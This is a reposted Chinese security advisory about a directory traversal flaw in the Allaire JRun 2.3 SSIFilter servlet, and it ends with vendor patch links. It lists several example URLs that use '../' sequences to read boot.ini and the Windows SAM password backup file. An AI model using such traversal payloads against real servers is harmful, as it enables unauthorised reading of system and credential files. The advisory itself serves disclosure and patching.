Allaire JRUN 2.3 查看任意文件漏洞

让心灵去旅行K

让心灵去旅行K

2016-01-29 12:46

Allaire JRUN 2.3 查看任意文件漏洞,Allaire JRUN 2.3 查看任意文件漏洞
涉及程序:
JRUN

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/java/)

描述:
Allaire JRUN 2.3 查看任意文件漏洞

详细:
Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞允许攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。
JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用URL前缀"/servlet/"调用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 URLs :

(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/java/)

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假设JRun在主机“ jrun ”上运行,端口8000。

受影响的系统:
Allaire JRun 2.3.x

解决方案:
下载并安装补丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar

展开更多 50%)
分享

猜你喜欢

Allaire JRUN 2.3 查看任意文件漏洞

Java JAVA基础
Allaire JRUN 2.3 查看任意文件漏洞

Allaire JRUN 2.3远程执行任意命令漏洞

Web开发
Allaire JRUN 2.3远程执行任意命令漏洞

s8lol主宰符文怎么配

英雄联盟 网络游戏
s8lol主宰符文怎么配

Apache泄露重写的任意文件漏洞

Web开发
Apache泄露重写的任意文件漏洞

Windows下PHP的任意文件执行漏洞

PHP
Windows下PHP的任意文件执行漏洞

lol偷钱流符文搭配推荐

英雄联盟 网络游戏
lol偷钱流符文搭配推荐

JRun2.3平台介绍

Java JAVA基础
JRun2.3平台介绍

从任意文件中回复Word文档

word
从任意文件中回复Word文档

lolAD刺客新符文搭配推荐

英雄联盟
lolAD刺客新符文搭配推荐

创建一个Flash站点的十大技巧

创建一个Flash站点的十大技巧

《部落战争》中飞龙流的打法相关解析

《部落战争》中飞龙流的打法相关解析
下拉加载更多内容 ↓